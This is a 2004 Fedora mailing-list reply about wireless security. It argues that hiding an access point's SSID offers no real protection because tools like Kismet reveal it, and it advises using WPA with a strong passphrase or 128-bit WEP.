Two security-related questions for wireless

Michael H. Warfield mhw at wittsend.com
Sat Jul 10 10:06:12 UTC 2004


Hey all,

On Sat, Jul 10, 2004 at 12:43:49AM -0400, J. Erik Hemdal wrote:

> > On Fri, 9 Jul 2004, Rick Stevens wrote:

> > > Terry Linhardt wrote:
> > > > I'm running Core 2, and from a laptop using a wireless (802.11-B) 
> > > > card to reach a WAP.  I have absolutely no problems in using a 
> > > > wireless configuration  *provided* I broadcast my SSID.  But, as 
> > > > soon as I no longer broadcast my SSID my wireless card 
> > cannot "find" the WAP.

> > > > Two questions:

> > > > 1) How can I configure my system to access my WAP by it's 
> > assigned ID.

> > > I'm not sure you can.  The ESSID is required or your card 
> > can't find 
> > > the network in the first place.  You might be able to bypass it by 
> > > forcing "CHANNEL=" in your ifcfg-wlan0 file, but I won't 
> > guarantee it.  
> > > BTW, what's your aversion to broadcasting your ESSID?  If you use a 
> > > WEP key, your network isn't really that succeptible to attack.

> > I think that if the WAP doesn't broadcast, then the station 
> > needs to specify the correct SSID.  If the WAP does broadcast 
> > then the station can "adopt" the broadcast SSID.

> Yes, and the client (your laptop) needs to know the channel you're using
> (often this is channel 6 by default).  Basically, when the access point
> fails to broadcast, the clients need to know everything about the connection
  ^^^^^^^^^^^^^^^^^^
	Fails to broadcast the ESSID.  It's still transmitting beacons.
Kismet picks them up REAL GOOD.  Maybe you are thinking of Ad Hoc mode
(which is something totally different and Kismet will still pick that
up once traffic begins).

> before it will work. SSID alone won't do it.  You can set the channel by
> correctly fiddling with redhat-config-network and editing the proper
> interface.  Use system-config-network on FC2.

	Turning off ESSID is virtually worthless from a security
standpoint (and some access points won't even let you do it).  Try
running Kismet for a while and you'll find out.  As soon as you get
even a decent amount of traffic to the AP, Kismet will capture the
ESSID from the traffic.  So, what did you really gain by not broadcasting
the ESSID?  Under some circumstances, you can even actively probe
a "cloaked" network and uncover its ESSID.

> > It's not clear to me what the point of broadcasting is if you 
> > then install WEP keys.

> This makes connection a little easier.  Some access points will deliver a
> WEP key automatically, so that you have encrypted transfers on a network
> that is publicly-available.

	That's not WEP.  That gets into WPA and/or 802.11i and/or 802.1x
and some other proprietary schemes.  Mostly, with public access points,
it will be WPA for which you need the supplicant client.

> > > > 2) On a related security issue, how can I make use of WEP 
> > encryption.

> > > Make sure your WAPs all have the same key (MINIMUM 128-bit 
> > encryption) 

	You've only really got two choices, 40 bit and 128 bit.  40 bit
is the old, deprecated, export grade encryption.  128 bit uses the
RC4 stream cipher with a 104 bit key from you (which is why it's
26 hex digits if you use hex mode) and a 24 bit "initialization
vector that it generates on a packet by packet basis.  If you've got
a reasonably modern AP, the AP will chose IVs (which are pretty much
arbitrary) in such a way as to avoid the weak key scheduling problem
with RC4 used in WEP.  Best way to know is to run Kismet for a while
and see if it captures any "weak encrypted packets".  WEP still has
its problems (still subject to the known plaintext codebook attack)
but you have to capture massive amounts of data (~2Gig) for which
you know both the plaintext and ciphertext.  WPA PSK (WPA Pre-Shared
Key) has its own problems and may even be weaker if you use a short
passphrase (minimum 17 characters or it can be busted by capturing
just a few packets).

> The encryption level is going to be set by the minimum encryption that all
> your wireless clients can support.  In my experience, Windows XP doesn't
> support 128-bit encryption.  This might prevent you from going to stronger
> encryption.

	This is incorrect.  W2K use to only support 128-bit encryption
if you installed the "high encryption pack" but that went away back in
an early service pack (SP2?  SP3?).  AFAIK...  Windows XP has pretty much
always supported 128-bit encryption.  Even if the initial version did not
(I THINK it did), you can't run Windows XP without SP1 (soon to be SP2 -
PLEASE INSTALL WHEN IT COMES OUT) and all the security roll-ups on the
Internet without getting infected in minutes, so you either have 128 bit
encryption or you have much bigger problems.

> > > Like I said, I'm not sure you need to hide your ESSID in the first 
> > > place.

	You don't.

> Probably for the same reason you set up a firewall rather than closing all
> your ports.  You can't hack a network you can't see.\

	Now THAT'S a load of bull.  You can see that network just fine
and Kismet can find it just fine.  It can see your beacon and identify
an active network that is not broadcasting its ESSID (aka - Red Flag!
Watch this network!) and it can capture the ESSID from live traffic.

	And don't say you can't hack a network you can't see.  LOTS
of networks get hacked every day that hackers can't see.  Worms do
that real good.  Worms and hacks get behind NAT devices everyday.
Took the "whitty worm" (which I tracked) less than 10 seconds to
slip behind a NAT firewall and get into a "network it couldn't see".

	Hiding the ESSID does not hide the network (hell, it doesn't
even really hid the ESSID).  Hiding the network doesn't prevent hacking.
Turning off the ESSID does not accomplish any significant security.

	Use WPA with a strong password, if you have it available.  If
not, use 128 bit WEP and use Kismet to test your access points for
strong scheduling of IVs (replace or upgrade if they don't).  You
should be pretty solid.

> Erik

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw at WittsEnd.com
  /\/\|=mhw=|\/\/       |  (678) 463-0932   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 307 bytes
Desc: not available
Url : http://lists.fedoraproject.org/pipermail/users/attachments/20040710/3b732cba/attachment-0002.bin 


More information about the users mailing list